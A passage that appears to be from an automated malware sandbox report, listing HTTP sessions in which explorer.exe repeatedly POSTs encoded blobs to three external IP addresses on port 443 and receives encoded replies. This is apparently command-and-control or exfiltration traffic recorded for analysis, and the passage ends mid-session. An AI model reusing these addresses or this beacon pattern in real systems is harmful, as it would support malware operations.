cGztJzwJz2l9/Gjv+01jwH+I4C2zLRglovPQ5UOcWNcOHfsb+DXEUAu7HWrVkJAhgWeBzwMCNecQH9T3hcaG+SnyVBYAy6MRg8BqBYnqLwfWlXXS0HS8o1BiDFFR+7uE+qzuUGksRP/27wWoByqr8Br6QSh1ZPqF4GZrEskbje442HeAYaDX7lLn5wsrlLZP4fsIDpJgMeewznnUtjzZlLbf5xtCFVUubr3d9WtTUUzFwkPFlSkwW1vxNV2aIQD

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
83	192.168.2.10	49839	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:42 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
2024-07-24 17:58:42 UTC	1267	OUT	Data Raw: 64 32 4f 67 47 7a 67 39 43 33 6d 67 6c 4d 4b 69 61 46 72 6c 66 65 68 48 70 66 56 30 76 35 4d 51 72 6e 70 55 6e 63 4c 63 59 4a 6f 53 6a 34 69 6a 4e 69 57 55 31 56 31 6e 36 2f 79 66 74 78 56 6b 49 66 78 54 43 69 4a 76 5a 78 50 58 65 75 6f 62 56 59 4b 72 42 46 65 53 48 52 38 73 66 59 6a 63 4a 52 42 56 66 6b 30 4f 4d 2f 6e 46 55 4c 4b 64 31 63 32 4e 57 48 7a 30 35 54 4f 72 50 78 67 71 34 37 37 7a 45 48 47 33 33 79 57 30 44 32 63 69 34 6b 67 44 45 57 55 72 6e 57 6d 63 72 31 79 77 43 6e 52 73 45 71 32 5a 66 43 4f 54 6c 2b 6a 76 50 74 46 68 2f 53 51 69 46 73 33 72 66 4e 71 4e 6d 4d 57 33 50 72 44 36 2f 54 71 33 42 50 4d 4d 48 5a 33 68 64 4b 48 6e 36 66 44 44 57 58 39 42 65 69 6d 75 44 72 39 4b 6b 38 34 2b 49 73 37 50 48 7a 59 52 43 53 49 6c 6d 55 45 55 32 72 4c Data Ascii: d2OgGzg9C3mglMKiaFrlfehHpfV0v5MQrnpUncLcYJoSj4ijNiWU1V1n6/yftxVkIfxTCiJvZxPXeuobVYKrBFeSHR8sfYjcJRBVfk0OM/nFULKd1c2NWHz05TOrPxgq477zEHG33yW0D2ci4kgDEWUrnWmcr1ywCnRsEq2ZfCOTl+jvPtFh/SQiFs3rfNqNmMW3PrD6/Tq3BPMMHZ3hdKHn6fDDWX9BeimuDr9Kk84+Is7PHzYRCSIlmUEU2rL
2024-07-24 17:58:43 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:43 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:43 UTC	685	IN	Data Raw: 65 62 7a 33 45 53 37 62 2b 30 35 63 34 71 4f 34 71 34 38 31 4b 41 46 4e 6c 6c 4f 61 71 75 58 4d 48 45 6f 6c 43 4a 64 79 6d 78 2f 2b 52 79 71 43 50 4c 62 54 78 73 42 78 51 68 59 68 35 30 32 4f 6b 31 67 47 41 78 4e 2f 6d 6d 77 37 34 66 54 32 37 59 32 62 53 67 31 74 61 36 6c 79 56 36 71 71 30 73 6b 68 4c 6c 4c 48 76 6c 57 52 56 77 31 2f 73 69 4a 47 71 36 34 4a 55 36 47 68 39 64 65 44 30 62 4b 72 2f 41 32 6a 34 7a 5a 36 33 74 34 2f 33 33 32 79 51 77 32 6a 68 6f 2f 34 6e 75 44 4e 4d 72 42 49 64 55 58 6b 36 78 77 47 5a 69 52 42 43 49 49 5a 33 58 6f 43 4a 62 42 4a 51 49 51 48 77 37 39 2f 70 6a 63 77 44 44 48 36 4c 2f 39 4a 43 73 5a 71 47 62 32 6a 61 4c 50 4b 33 66 4a 52 7a 7a 6e 73 52 56 2f 4e 66 62 6d 78 52 6d 47 4d 43 6a 54 2b 4e 62 42 79 42 6f 71 67 42 63 4c Data Ascii: ebz3ES7b+05c4qO4q481KAFNllOaquXMHEolCJdymx/+RyqCPLbTxsBxQhYh502Ok1gGAxN/mmw74fT27Y2bSg1ta6lyV6qq0skhLlLHvlWRVw1/siJGq64JU6Gh9deD0bKr/A2j4zZ63t4/332yQw2jho/4nuDNMrBIdUXk6xwGZiRBCIIZ3XoCJbBJQIQHw79/pjcwDDH6L/9JCsZqGb2jaLPK3fJRzznsRV/NfbmxRmGMCjT+NbByBoqgBcL

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
84	192.168.2.10	49841	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:44 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:44 UTC	1122	OUT	Data Raw: 45 45 68 6a 69 49 6d 70 37 71 6b 75 33 58 41 71 38 63 53 56 33 38 57 50 50 79 37 62 6f 52 43 45 64 55 71 71 4d 5a 4f 4b 51 36 58 44 68 7a 6c 79 4f 73 4f 6d 47 75 51 62 50 64 44 6e 54 38 51 54 7a 67 79 2b 35 4b 45 4f 4c 42 74 31 4a 62 78 45 56 62 57 4a 58 4f 45 2b 35 41 78 4a 6e 32 69 79 64 4d 34 4d 34 55 59 36 74 7a 2f 33 33 64 79 75 69 47 2f 38 6f 57 4e 4b 67 77 6d 77 39 73 6d 31 44 58 6d 32 34 47 4d 46 79 77 57 50 67 39 53 6c 62 68 61 55 6c 66 4a 45 73 46 6b 66 4d 36 34 74 4c 64 47 46 6f 69 6a 61 46 6c 38 31 61 38 44 45 34 49 45 6f 50 50 44 79 4e 33 62 4d 43 64 41 73 62 56 58 33 32 55 4f 69 75 42 43 56 46 64 6c 64 53 2b 47 53 58 57 6c 53 61 6d 41 69 54 77 4c 70 79 34 42 36 71 61 62 69 71 47 59 5a 66 77 75 71 5a 75 69 67 61 58 47 72 59 2f 71 35 6e 55 32 Data Ascii: EEhjiImp7qku3XAq8cSV38WPPy7boRCEdUqqMZOKQ6XDhzlyOsOmGuQbPdDnT8QTzgy+5KEOLBt1JbxEVbWJXOE+5AxJn2iydM4M4UY6tz/33dyuiG/8oWNKgwmw9sm1DXm24GMFywWPg9SlbhaUlfJEsFkfM64tLdGFoijaFl81a8DE4IEoPPDyN3bMCdAsbVX32UOiuBCVFdldS+GSXWlSamAiTwLpy4B6qabiqGYZfwuqZuigaXGrY/q5nU2
2024-07-24 17:58:45 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:45 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:45 UTC	685	IN	Data Raw: 4b 61 2f 33 72 47 78 36 32 73 51 39 71 71 37 63 4f 2f 72 47 34 6f 43 57 57 33 69 67 52 78 5a 6e 4c 72 51 57 4a 72 41 46 4b 2f 6d 79 46 38 6c 78 33 4b 4e 4b 73 36 6f 49 57 37 61 54 4d 4e 47 36 37 50 7a 64 46 2b 64 67 4a 5a 6d 2f 77 71 54 6c 66 69 63 68 6f 36 45 6d 37 6a 64 68 6d 4a 36 32 58 44 62 4e 68 57 4f 76 55 63 68 2b 4e 48 74 4e 33 6a 58 6d 33 46 62 4b 48 31 52 55 56 42 42 50 5a 7a 6b 6c 6b 45 42 58 61 77 54 4c 78 66 70 4e 56 38 73 42 61 76 4f 67 37 36 78 45 59 32 64 67 32 76 54 69 44 6d 7a 5a 63 6d 77 53 59 31 69 51 48 39 37 32 62 6a 32 53 6b 56 61 2f 42 45 32 78 50 7a 7a 30 75 39 6e 49 78 54 32 32 7a 5a 78 4d 6a 37 66 74 38 57 50 57 4d 5a 4f 6d 7a 47 65 56 6f 57 70 73 4e 48 79 69 58 70 68 72 69 52 55 42 55 66 52 55 7a 64 6f 6a 64 44 6a 63 4b 67 33 Data Ascii: Ka/3rGx62sQ9qq7cO/rG4oCWW3igRxZnLrQWJrAFK/myF8lx3KNKs6oIW7aTMNG67PzdF+dgJZm/wqTlficho6Em7jdhmJ62XDbNhWOvUch+NHtN3jXm3FbKH1RUVBBPZzklkEBXawTLxfpNV8sBavOg76xEY2dg2vTiDmzZcmwSY1iQH972bj2SkVa/BE2xPzz0u9nIxT22zZxMj7ft8WPWMZOmzGeVoWpsNHyiXphriRUBUfRUzdojdDjcKg3

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
85	192.168.2.10	49842	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:46 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:46 UTC	1122	OUT	Data Raw: 47 44 66 56 37 30 4f 48 63 4c 30 4f 47 30 53 63 56 74 79 71 52 62 4c 51 33 6b 36 35 4a 38 53 4f 61 76 73 6c 48 32 43 46 69 49 7a 6f 4a 35 6c 78 58 68 4e 56 45 63 47 73 53 46 4a 36 76 50 45 42 6d 6d 4c 4b 75 54 69 59 6c 6d 39 79 6c 4a 64 70 55 65 4b 76 70 50 56 55 33 4a 77 6e 45 49 56 37 69 48 5a 6a 73 57 56 68 41 54 74 50 6a 6c 4b 58 45 30 65 69 42 71 4c 6b 59 35 69 58 42 42 52 31 74 33 39 32 41 62 64 6a 73 32 53 58 35 6f 32 32 63 4c 67 4f 56 6b 55 52 53 54 48 79 77 44 4e 2b 4f 4d 4f 35 5a 53 73 72 6b 79 56 6b 72 42 79 6a 58 56 52 73 55 49 53 51 44 53 67 30 59 34 5a 49 48 68 56 4b 70 56 58 64 36 66 58 62 6d 7a 50 41 70 50 47 53 76 74 72 2b 46 31 2f 52 6c 34 71 46 4c 50 57 6b 70 59 50 76 62 6f 6d 49 2b 35 33 49 42 33 6c 6a 2f 42 50 6b 77 64 48 63 7a 78 66 Data Ascii: GDfV70OHcL0OG0ScVtyqRbLQ3k65J8SOavslH2CFiIzoJ5lxXhNVEcGsSFJ6vPEBmmLKuTiYlm9ylJdpUeKvpPVU3JwnEIV7iHZjsWVhATtPjlKXE0eiBqLkY5iXBBR1t392Abdjs2SX5o22cLgOVkURSTHywDN+OMO5ZSsrkyVkrByjXVRsUISQDSg0Y4ZIHhVKpVXd6fXbmzPApPGSvtr+F1/Rl4qFLPWkpYPvbomI+53IB3lj/BPkwdHczxf
2024-07-24 17:58:47 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:47 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:47 UTC	685	IN	Data Raw: 52 4e 52 41 44 62 76 31 77 34 69 64 70 4d 74 52 6e 79 72 72 67 76 38 36 58 4c 49 57 74 58 31 41 45 39 45 7a 53 54 4d 36 6f 58 65 34 66 6b 50 30 47 4f 74 31 43 69 51 72 47 5a 31 2b 48 77 59 2b 52 78 49 2f 7a 6b 63 4c 73 34 68 66 76 48 4d 78 50 79 5a 64 30 57 58 69 4b 70 61 35 6e 44 55 6d 55 49 41 41 35 77 48 6c 48 68 72 73 68 67 34 57 55 55 42 30 49 6f 36 78 58 4a 75 61 69 32 70 46 5a 59 71 52 62 71 6c 6f 62 53 75 66 32 52 34 53 57 52 31 63 42 6c 45 75 51 43 75 5a 7a 55 38 68 58 46 6c 43 58 72 6e 5a 4c 6e 6b 52 35 76 4b 63 71 75 73 35 2f 79 47 53 56 58 63 63 56 4a 37 6c 36 42 56 6b 69 42 49 75 43 51 6a 58 63 46 70 69 4f 4b 4d 6c 46 46 6f 38 6c 39 5a 66 79 58 6a 51 4c 73 4c 45 2b 53 67 43 74 43 43 34 4d 6c 5a 2f 31 59 38 38 34 4d 30 46 7a 43 32 74 31 71 49 Data Ascii: RNRADbv1w4idpMtRnyrrgv86XLIWtX1AE9EzSTM6oXe4fkP0GOt1CiQrGZ1+HwY+RxI/zkcLs4hfvHMxPyZd0WXiKpa5nDUmUIAA5wHlHhrshg4WUUB0Io6xXJuai2pFZYqRbqlobSuf2R4SWR1cBlEuQCuZzU8hXFlCXrnZLnkR5vKcqus5/yGSVXccVJ7l6BVkiBIuCQjXcFpiOKMlFFo8l9ZfyXjQLsLE+SgCtCC4MlZ/1Y884M0FzC2t1qI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
86	192.168.2.10	49843	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:48 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:48 UTC	1122	OUT	Data Raw: 65 6c 65 36 59 4f 69 2f 45 46 68 79 39 70 4a 64 77 75 73 36 58 6c 63 43 64 43 4d 58 6a 42 73 4f 36 72 46 4b 6c 75 49 46 6f 7a 36 4c 73 58 77 58 4f 66 69 36 77 35 66 6d 56 5a 47 52 69 4c 63 6c 66 36 41 43 78 4b 52 57 6f 4d 6e 4b 4e 37 76 50 6a 56 54 6a 49 6d 75 77 5a 49 76 73 6c 38 68 30 44 6e 68 54 62 67 77 73 69 7a 76 56 68 42 65 39 75 61 45 65 46 77 34 45 4e 62 54 31 32 2f 2b 6f 64 53 6b 6a 6b 45 79 32 6b 61 4f 52 31 6f 4c 38 77 63 45 5a 61 4a 34 5a 71 49 73 76 33 42 4d 65 6b 4d 58 4c 4d 73 61 6a 59 31 6a 72 32 77 34 70 46 61 44 57 62 30 4a 54 47 65 35 4d 45 74 4a 4b 44 32 5a 4d 64 4c 44 50 38 61 45 73 68 57 61 54 45 2b 4b 47 45 44 43 6e 56 73 54 38 46 78 77 51 4a 6a 53 54 6b 66 59 50 4c 61 6c 4c 79 54 34 64 51 63 63 54 55 43 6e 62 63 39 2f 57 64 53 31 Data Ascii: ele6YOi/EFhy9pJdwus6XlcCdCMXjBsO6rFKluIFoz6LsXwXOfi6w5fmVZGRiLclf6ACxKRWoMnKN7vPjVTjImuwZIvsl8h0DnhTbgwsizvVhBe9uaEeFw4ENbT12/+odSkjkEy2kaOR1oL8wcEZaJ4ZqIsv3BMekMXLMsajY1jr2w4pFaDWb0JTGe5MEtJKD2ZMdLDP8aEshWaTE+KGEDCnVsT8FxwQJjSTkfYPLalLyT4dQccTUCnbc9/WdS1
2024-07-24 17:58:49 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:49 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:49 UTC	685	IN	Data Raw: 6a 4f 56 4d 2f 51 32 6a 6b 63 30 6b 4e 44 75 78 6c 58 31 33 53 77 7a 6b 76 62 39 56 75 76 75 4a 4a 4a 6d 76 51 35 6a 35 66 78 64 4c 79 63 32 2b 66 52 48 51 4b 42 56 4f 59 6c 38 6e 62 74 37 6f 62 33 37 4b 43 33 32 57 46 6d 4c 58 79 4f 33 67 48 63 52 4b 45 38 4d 36 57 6c 62 57 4b 4b 6b 5a 73 58 69 47 6e 65 50 57 54 33 36 65 46 53 49 6c 51 38 57 33 78 59 54 2f 47 4f 30 77 77 39 35 56 45 35 6b 51 4a 51 75 73 69 73 4e 6d 73 66 6c 44 53 62 42 31 71 67 77 70 66 6c 6b 38 42 56 4b 54 4d 62 31 51 64 75 6f 41 45 6f 6f 37 79 6e 77 4c 59 33 35 46 76 4c 50 39 72 5a 44 4b 66 67 78 50 49 58 73 79 4b 70 67 69 61 74 6a 61 6b 68 31 53 35 69 70 61 2b 32 4f 72 66 79 46 57 35 63 31 73 56 2b 64 68 55 6d 51 63 32 6e 4a 72 4a 63 56 4f 51 73 2f 4d 6a 6f 6e 61 4a 41 4d 55 66 52 69 Data Ascii: jOVM/Q2jkc0kNDuxlX13Swzkvb9VuvuJJJmvQ5j5fxdLyc2+fRHQKBVOYl8nbt7ob37KC32WFmLXyO3gHcRKE8M6WlbWKKkZsXiGnePWT36eFSIlQ8W3xYT/GO0ww95VE5kQJQusisNmsflDSbB1qgwpflk8BVKTMb1QduoAEoo7ynwLY35FvLP9rZDKfgxPIXsyKpgiatjakh1S5ipa+2OrfyFW5c1sV+dhUmQc2nJrJcVOQs/MjonaJAMUfRi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
87	192.168.2.10	49844	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:50 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:50 UTC	1122	OUT	Data Raw: 6b 7a 50 66 4e 39 64 6a 31 49 70 6c 46 67 2f 72 71 5a 31 33 77 54 57 50 67 62 45 38 56 51 78 6d 68 78 54 66 4d 35 69 41 50 35 6d 62 68 65 71 4a 4a 66 5a 57 4c 2f 61 79 36 76 6e 63 6f 31 54 31 67 33 34 4c 4a 54 65 53 38 46 49 6b 4a 51 51 30 68 57 34 66 30 38 58 50 57 41 4b 70 31 76 49 31 7a 44 64 73 5a 6d 41 44 33 56 4f 4a 69 6f 6a 65 47 69 79 6d 52 61 4a 54 61 37 76 77 47 36 44 48 44 59 57 45 78 45 56 43 63 33 72 69 55 73 62 4f 30 52 2f 45 52 2f 4b 31 51 76 58 56 66 58 7a 6a 51 6a 51 63 58 37 2b 53 58 55 30 55 4f 70 67 43 32 65 67 6e 55 55 52 56 44 31 68 69 57 77 52 42 7a 66 44 33 51 67 75 41 4d 49 4c 52 71 76 61 49 79 4f 59 47 37 55 39 50 42 6d 6e 5a 4f 59 42 4f 73 62 66 33 69 78 67 70 4a 42 65 62 35 67 79 52 67 39 58 79 67 79 72 69 49 31 75 53 72 64 58 Data Ascii: kzPfN9dj1IplFg/rqZ13wTWPgbE8VQxmhxTfM5iAP5mbheqJJfZWL/ay6vnco1T1g34LJTeS8FIkJQQ0hW4f08XPWAKp1vI1zDdsZmAD3VOJiojeGiymRaJTa7vwG6DHDYWExEVCc3riUsbO0R/ER/K1QvXVfXzjQjQcX7+SXU0UOpgC2egnUURVD1hiWwRBzfD3QguAMILRqvaIyOYG7U9PBmnZOYBOsbf3ixgpJBeb5gyRg9XygyriI1uSrdX
2024-07-24 17:58:52 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:51 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:52 UTC	685	IN	Data Raw: 4a 59 6b 59 53 48 6e 78 74 78 44 4b 53 37 6c 68 31 4f 6c 79 2b 62 41 79 36 48 45 43 53 61 33 6a 65 30 54 4e 2f 54 6f 4e 65 74 2f 33 43 4e 33 4e 50 2f 32 4d 79 69 58 57 59 32 37 63 6a 4b 33 74 75 76 31 53 77 70 56 38 42 2b 76 61 5a 63 43 4a 70 39 30 73 77 56 35 49 4f 45 7a 71 68 76 48 36 6e 77 64 56 64 55 74 79 64 6a 46 55 55 48 41 76 53 44 72 7a 4e 53 52 36 5a 66 6d 4d 51 68 6c 4d 4b 36 4d 73 59 57 44 34 74 79 4c 31 42 55 76 6c 41 74 66 67 35 44 67 34 63 6c 56 53 6e 76 70 4f 75 7a 69 43 6c 56 43 68 4b 4b 44 6e 62 78 7a 53 49 43 69 33 58 54 52 6b 72 35 74 30 56 4c 52 53 74 68 72 52 63 72 6d 56 43 75 45 6d 6d 76 71 7a 35 6f 37 6a 38 51 4d 53 6e 2f 78 31 57 58 79 49 36 53 63 52 4b 71 50 64 37 35 4f 57 74 59 65 6d 74 35 37 56 51 46 68 61 57 30 33 46 45 36 34 Data Ascii: JYkYSHnxtxDKS7lh1Oly+bAy6HECSa3je0TN/ToNet/3CN3NP/2MyiXWY27cjK3tuv1SwpV8B+vaZcCJp90swV5IOEzqhvH6nwdVdUtydjFUUHAvSDrzNSR6ZfmMQhlMK6MsYWD4tyL1BUvlAtfg5Dg4clVSnvpOuziClVChKKDnbxzSICi3XTRkr5t0VLRSthrRcrmVCuEmmvqz5o7j8QMSn/x1WXyI6ScRKqPd75OWtYemt57VQFhaW03FE64

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
88	192.168.2.10	49845	167.235.128.153	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:52 UTC	234	OUT	POST / HTTP/1.1 Host: 167.235.128.153 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:52 UTC	1122	OUT	Data Raw: 45 57 43 72 6a 67 55 72 63 36 35 43 63 48 38 78 4e 70 79 36 66 37 74 4b 4f 37 6d 49 6c 35 36 54 47 41 4d 4b 35 2f 44 78 77 6c 68 59 49 36 66 74 76 74 4e 64 4a 77 4a 37 54 78 63 6e 44 44 76 30 4a 69 45 73 6e 73 4d 37 6f 42 43 58 31 58 78 5a 30 64 49 78 37 70 48 32 64 5a 41 4e 58 4f 59 72 68 48 74 30 57 35 61 66 68 4c 76 57 79 61 4a 70 7a 48 75 52 4b 59 42 63 4c 56 31 78 72 6f 59 72 78 42 4b 61 48 76 70 58 76 59 65 57 79 7a 51 35 6e 66 6c 56 6e 47 51 4c 6b 4d 79 5a 35 48 77 35 4c 69 46 36 34 34 61 70 30 43 52 77 6b 54 34 51 38 62 4a 67 73 46 4c 65 2b 33 48 5a 50 4a 33 4d 51 31 6f 4b 33 6e 64 68 5a 69 6a 4a 77 66 6d 56 65 67 4e 6c 61 56 54 6c 6f 53 43 64 6d 36 47 44 76 37 59 59 2f 49 64 33 51 61 4e 65 48 63 73 2f 53 64 78 50 6e 73 37 34 71 36 6f 50 55 70 70 Data Ascii: EWCrjgUrc65CcH8xNpy6f7tKO7mIl56TGAMK5/DxwlhYI6ftvtNdJwJ7TxcnDDv0JiEsnsM7oBCX1XxZ0dIx7pH2dZANXOYrhHt0W5afhLvWyaJpzHuRKYBcLV1xroYrxBKaHvpXvYeWyzQ5nflVnGQLkMyZ5Hw5LiF644ap0CRwkT4Q8bJgsFLe+3HZPJ3MQ1oK3ndhZijJwfmVegNlaVTloSCdm6GDv7YY/Id3QaNeHcs/SdxPns74q6oPUpp
2024-07-24 17:58:53 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:53 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:53 UTC	685	IN	Data Raw: 47 48 53 31 5a 7a 42 70 79 66 4d 59 76 66 6b 73 41 59 47 67 56 43 74 36 42 57 30 77 62 6b 78 52 7a 4b 52 6f 71 6d 62 72 67 56 42 66 4e 70 47 79 55 57 54 57 52 79 79 6c 39 42 48 32 43 73 63 67 38 55 4f 61 43 69 6e 53 31 4b 64 6a 50 63 65 30 6f 53 2f 32 73 51 6c 77 62 33 78 72 66 6f 6e 69 43 41 74 74 66 30 2f 32 64 51 73 2b 66 41 36 6a 46 44 4a 58 4e 64 33 6c 4f 62 52 5a 62 44 2f 4b 4e 77 52 68 4e 59 58 61 39 66 43 63 4d 4b 6e 38 55 76 4d 47 41 6e 44 52 39 75 62 5a 33 42 43 38 4a 46 53 66 46 48 43 4e 48 44 6f 50 54 47 59 54 58 5a 71 5a 43 63 58 50 2b 56 39 62 41 34 4c 39 38 54 75 78 69 39 34 49 61 71 39 6c 2b 47 43 6f 62 41 55 6a 2b 62 77 6e 56 4f 6a 50 4d 69 57 50 67 49 4f 58 66 4d 5a 33 4c 31 57 32 53 76 2b 61 2f 36 34 35 69 49 37 47 45 74 46 34 37 70 69 Data Ascii: GHS1ZzBpyfMYvfksAYGgVCt6BW0wbkxRzKRoqmbrgVBfNpGyUWTWRyyl9BH2Cscg8UOaCinS1KdjPce0oS/2sQlwb3xrfoniCAttf0/2dQs+fA6jFDJXNd3lObRZbD/KNwRhNYXa9fCcMKn8UvMGAnDR9ubZ3BC8JFSfFHCNHDoPTGYTXZqZCcXP+V9bA4L98Tuxi94Iaq9l+GCobAUj+bwnVOjPMiWPgIOXfMZ3L1W2Sv+a/645iI7GEtF47pi

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
89	192.168.2.10	49846	107.173.160.137	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:54 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.137 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1122
2024-07-24 17:58:54 UTC	1122	OUT	Data Raw: 58 56 61 31 7a 7a 43 75 68 37 47 73 46 63 6d 34 65 5a 71 52 59 38 66 6c 78 2b 46 66 2b 64 56 2f 79 4c 64 39 49 49 4f 49 36 75 4d 57 42 73 39 52 6c 6c 42 47 45 6f 45 5a 71 7a 42 6f 61 4c 76 77 7a 72 70 72 62 6f 64 32 47 79 75 4f 35 63 71 41 47 66 52 71 4f 49 75 65 61 4d 6a 42 48 47 4e 6c 2b 75 58 73 61 69 74 6f 4d 77 63 77 6e 48 6c 39 66 2f 52 53 73 4e 34 71 35 46 35 42 7a 5a 53 51 50 4b 4b 75 42 54 65 65 54 4d 72 69 30 67 56 6c 43 61 6d 4a 75 6e 47 54 32 67 56 76 55 4b 50 76 39 66 68 50 47 6a 6e 79 46 63 6d 49 69 73 63 4e 71 6a 35 70 49 5a 6c 61 68 6a 47 71 30 7a 47 4e 74 48 64 42 56 58 51 50 32 62 73 37 78 66 75 39 63 4b 34 6e 34 53 77 71 52 52 52 44 72 73 51 53 70 58 5a 33 30 46 4c 76 32 64 4d 44 6e 72 2b 4a 54 55 6f 64 4c 4e 64 6c 55 5a 73 58 4e 61 4c Data Ascii: XVa1zzCuh7GsFcm4eZqRY8flx+Ff+dV/yLd9IIOI6uMWBs9RllBGEoEZqzBoaLvwzrprbod2GyuO5cqAGfRqOIueaMjBHGNl+uXsaitoMwcwnHl9f/RSsN4q5F5BzZSQPKKuBTeeTMri0gVlCamJunGT2gVvUKPv9fhPGjnyFcmIiscNqj5pIZlahjGq0zGNtHdBVXQP2bs7xfu9cK4n4SwqRRRDrsQSpXZ30FLv2dMDnr+JTUodLNdlUZsXNaL
2024-07-24 17:58:56 UTC	137	IN	HTTP/1.1 200 OK Content-Length: 685 Date: Wed, 24 Jul 2024 17:58:56 GMT Content-Type: text/plain; charset=utf-8 Connection: close
2024-07-24 17:58:56 UTC	685	IN	Data Raw: 53 5a 75 53 4b 6f 4c 5a 68 30 31 49 56 44 42 74 6f 78 72 31 67 6b 66 34 61 69 52 58 69 2f 5a 4e 57 45 6d 41 6a 2f 45 47 6d 74 2f 4b 35 46 7a 35 37 61 43 77 47 75 4a 61 62 30 5a 6a 77 78 50 52 75 64 50 61 77 57 53 46 5a 78 34 6c 59 43 39 79 53 66 76 69 42 61 36 65 65 74 5a 30 34 2b 6b 32 6c 6e 46 6c 51 56 36 2f 55 4c 32 36 67 6c 45 6c 74 36 6c 53 6d 56 55 62 34 62 65 66 63 74 79 45 59 72 73 61 36 39 68 48 70 64 6c 46 35 32 45 74 6b 67 73 66 31 35 50 64 79 4c 63 62 62 46 6f 38 5a 4a 7a 77 59 6c 6b 67 34 43 57 63 68 52 2f 4d 6e 69 45 55 43 43 4e 61 59 4b 70 45 57 43 50 31 70 77 46 48 55 32 75 57 56 4c 7a 6b 6e 38 4d 2f 48 42 4e 2b 72 42 44 68 74 34 4e 55 5a 6a 36 72 75 78 69 52 6c 4f 38 32 73 48 70 4a 50 43 2b 4b 6e 6f 50 4e 38 6f 57 7a 4f 59 44 43 61 41 39 Data Ascii: SZuSKoLZh01IVDBtoxr1gkf4aiRXi/ZNWEmAj/EGmt/K5Fz57aCwGuJab0ZjwxPRudPawWSFZx4lYC9ySfviBa6eetZ04+k2lnFlQV6/UL26glElt6lSmVUb4befctyEYrsa69hHpdlF52Etkgsf15PdyLcbbFo8ZJzwYlkg4CWchR/MniEUCCNaYKpEWCP1pwFHU2uWVLzkn8M/HBN+rBDht4NUZj6ruxiRlO82sHpJPC+KnoPN8oWzOYDCaA9

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
90	192.168.2.10	49848	107.173.160.139	443	3968	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-24 17:58:56 UTC	234	OUT	POST / HTTP/1.1 Host: 107.173.160.139 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Connection: close Content-Type: text/plain Content-Length: 1267
